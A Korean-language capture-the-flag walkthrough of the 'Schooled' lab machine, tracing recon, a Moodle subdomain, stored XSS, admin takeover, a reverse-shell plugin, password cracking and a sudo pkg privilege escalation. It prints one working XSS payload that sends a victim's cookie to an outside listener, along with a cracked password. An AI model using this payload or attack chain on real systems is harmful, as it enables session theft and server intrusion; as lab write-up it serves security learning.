[MEDIUM] Schooled

먼저 아이피로 nmap, nikto, dirb를 돌려보자.

Freebsd 기반의 서버이다. 22, 80번 포트가 열려있다.

웹사이트에 접속해보자.

접속은 잘된다. 하지만 사이트내에서 삽질 해봤지만 단서가 될만한건 찾지 못했다.

하위 도메인이 있는지 찾아보자.

툴을 돌리니 moodle이라는 하위 도메인 하나가 검출됐다.

설정하고 들어가보자.

이런 사이트 하나가 주어진다. 회원가입해보자.

사이트를 둘러보다 수강신청을 해보니 공지사항에 글이 있었다. 수강신청을 하면 내 프로필을 본다고 한다. 프로필을 둘러보자.

Xss 해보자.

된다.. 선생님 계정의 쿠키를 따보자..

서버를 열고 xss해보자

<script>location.href=http://10.10.14.5:7777/+document.cookie</script>

올리고 수강신청을 한 뒤 선생님이 내 계정을 확인할 때까지 기다려보자.

잘 들어왔다. 로그인 해보자.

여기선 삽질을 했다. 선생님 계정의 쿠키를 얻었고 툴을 사용해서 어드민 계정으로 상승해보자.

Admin 계정으로 잘 올라갔다.

Moodle 취약점을 활용해서 reverse shell을 붙여보자.

기다리고,

리버스쉘 플러그인을 올리자.

그리고 경로에 찾아가자.

쉘이 잘 붙었다.

웹 서버를 둘러보자

Db 계정 정보가 적힌 php파일이 있었다. 유저 계정까지 타고들어가보자.

Jamie 계정의 비밀번호를 john the ripper로 decrypt해보자.

!QAZ2wsx 가 비번인 듯 하다. Ssh로 연결하자.

user쉘이 정상적으로 따졌다.

패스워드 없이 sudo 권한으로 명령어를 쓸  수 있는 명령어이다.

이 친구를 사용하면 될 것 같다.

로컬에서 만들어서 타겟 서버에 넘겨준 뒤에 pkg instal을 하자.

이렇게 /root/root.txt 의 플래그를 출력하도록 수정해서 잘 읽어왔다

 

끝.